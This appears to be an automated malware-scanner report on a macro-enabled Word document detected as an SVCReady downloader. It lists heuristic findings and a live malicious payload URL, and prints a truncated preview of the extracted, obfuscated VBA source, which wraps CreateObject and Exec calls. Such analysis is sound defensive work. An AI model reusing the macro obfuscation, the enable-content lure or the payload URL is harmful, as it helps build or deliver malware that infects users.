Malware Insights
The sample is an OOXML document containing VBA macros, including a Document_Open macro that uses CreateObject to execute code. The document body explicitly instructs the user to 'Enable editing' and 'Enable content', indicating a social engineering lure. The VBA script appears to download a payload from the URL http://64.188.27.166/ts/W9gJctVTVtb9pCt9DPnhT1CK8_k2gTNgfw~~/djal-AcEj3HsWTRuN9tJJAl5jMecfVKm9A~~/, which is also referenced as an external relationship and a remote image beacon. This suggests the document's primary purpose is to act as a downloader for further malicious activity.
Heuristics 9
-
ClamAV: Doc.Downloader.SVCReady-c5c43a913b3eccc9-9953477-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.SVCReady-c5c43a913b3eccc9-9953477-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Remote image (web beacon / tracking pixel) medium OOXML_IMAGE_BEACONDocument references an external image URL — loads automatically on open, revealing IP address and timestamp to the server (used for phishing tracking and NTLM hash theft on corporate networks)
-
External relationship medium OOXML_EXTERNAL_RELExternal target in word/_rels/document.xml.rels: http://64.188.27.166/ts/W9gJctVTVtb9pCt9DPnhT1CK8_k2gTNgfw~~/djal-AcEj3HsWTRuN9tJJAl5jMecfVKm9A~~/
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://64.188.27.166/ts/W9gJctVTVtb9pCt9DPnhT1CK8_k2gTNgfw~~/djal-AcEj3HsWTRuN9tJJAl5jMecfVKm9A~~/ OOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9123 bytes |
SHA-256: 89cc58196fdc847cd808467c41932346efba070ee994d3c42a3ada98a91ad472 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function cro(x)
Set cro = _
CreateObject _
(x)
End Function
Private Function pdni(x, b)
Set pdni = x. _
Exec _
(b)
End Function
Function forbt3g480ocx6naul52fe()
Dim s5cv As String: s5cv = ""
s5cv = "" & ActiveDocument.Bookmarks.Item("stde3mwshe1lxl0oep4i7zc").Range.text
Dim vfr1 As String: vfr1 = ""
vfr1 = vfr1 & " Serologic lilting ambulatorium factitude preignition abomasa"
vfr1 = vfr1 & " Autonoe polarizations budges abomasa barbaloin ascogone"
vfr1 = vfr1 & " Bludging"
vfr1 = ghiojhe(vfr1)
Dim xs5cv As String: xs5cv = xsx(ghiojhe(s5cv), ActiveDocument.CustomDocumentProperties("06bw6vqqjbj92c22a49enub").Value)
Dim vjsy As String: vjsy = ""
vjsy = vjsy & " Immortalist fettles challengers koerlin clabularium"
vjsy = vjsy & " Nonvolatilized misrate squadding rabassa palanquiningly"
vjsy = vjsy & " Thymelaeales clabularium tuberculoprotein diversely enfrenzy"
vjsy = vjsy & " Abomasa hierarchize assiniboine lorris"
vjsy = vjsy & " Grimacier ambulatorium factitude preignition"
vjsy = vjsy & " Orpington assailant lignocaine escapeless"
vjsy = vjsy & " Curbings thymelaeales chlamydospore fettler"
vjsy = vjsy & " Overpleased thoracentesis bludging budger uncorrupt"
vjsy = vjsy & " Turkophile nonallegoric decapitalization turkophile incompatibilities"
vjsy = vjsy & " Grig coxcombess picote autoerotism coxcombess"
vjsy = vjsy & " Quinquepetaloid nonane lilting wolf-shaped nre cacanapa"
vjsy = vjsy & " Sauch terat- budges turkophile operantly premonitive"
vjsy = vjsy & " Eureka rehumanize incompatibilities suasoria gabrielrache fettles"
vjsy = vjsy & " Fala pharyngobranchiate immortalist everbearer bodkins civitan"
vjsy = vjsy & " Rabassa lilting koerlin"
vjsy = vjsy & " Nonremission compassionless fettles"
vjsy = vjsy & " Grimacier immunises pseudoascetical"
vjsy = vjsy & " Rachycentron abomasa quinquepetaloid"
vjsy = vjsy & " Nonremission fettles lilting"
vjsy = vjsy & " Versemongery pseudoascetical housemen"
vjsy = vjsy & " Perjinkly scurflike bludging"
vjsy = vjsy & " Undrainable budges puckermouth"
vjsy = vjsy & " Rethunder undrainable nematocyst"
vjsy = vjsy & " Immuniser squelch protegees"
vjsy = vjsy & " Hainai suasoria lilting"
vjsy = vjsy & " Versemongery factitude rachycentron"
vjsy = vjsy & " Fala quinquepetaloid possessioner"
vjsy = vjsy & " Diversely pumpable immuniser"
vjsy = vjsy & " Succinimid diversely scurflike"
vjsy = vjsy & " Inerrable irresistless skinked"
vjsy = vjsy & " Equated layperson forbare solutionist red-crowned pedicurists"
vjsy = vjsy & " Nonallegoric incorruptible thoracentesis unbeseemingly lignocaine budges"
vjsy = vjsy & " Escapeless ascogone hasbro greatened trinity budges"
vjsy = vjsy & " Rehumanize trinity undrainable muchacho underwrapping"
vjsy = vjsy & " Nonane misrate enp- remote autoerotism"
vjsy = vjsy & " Curbings mountained diversely dirgeman premiered"
vjsy = vjsy & " Dreaded misrate fleabug sauch nonvolatilized"
vjsy = vjsy & " Grimacier wolf-shaped misrate undrainable hypertechnically"
vjsy = vjsy & " Pharyngobranchiate kingcob rehumanize serious-mindedly razors"
vjsy = vjsy & " Pharyngobranchiate uncorrupt perjinkly unpracticality unwalkable lavena"
vjsy = vjsy & " Lilting versemongery volvelle cacanapa abulfeda brazenfacedly"
vjsy = vjsy & " Subpermanently underwrapping autoerotism adjures rehumanize decapitalization"
vjsy = vjsy & " Fleabug puckermouth nonallegoric clabularium signalled beclart"
vjsy = vjsy & " Grig overgratify nondistortedness serologic lilting"
vjsy = vjsy & " Immunises lignocaine housemen abomasa brazenfacedly"
vjsy = vjsy & " Countervaunt lagune operantly perjinkly rabassa"
vjsy = vjsy & " Boyaux sauch psychoclinical spluther"
vjsy = vjsy & " Immunises misrate budg
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 33280 bytes |
SHA-256: 496e8ef135c21822bc7fe0f97c2239b4cbfce983327b42dfc1093b3cb84a32b5 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.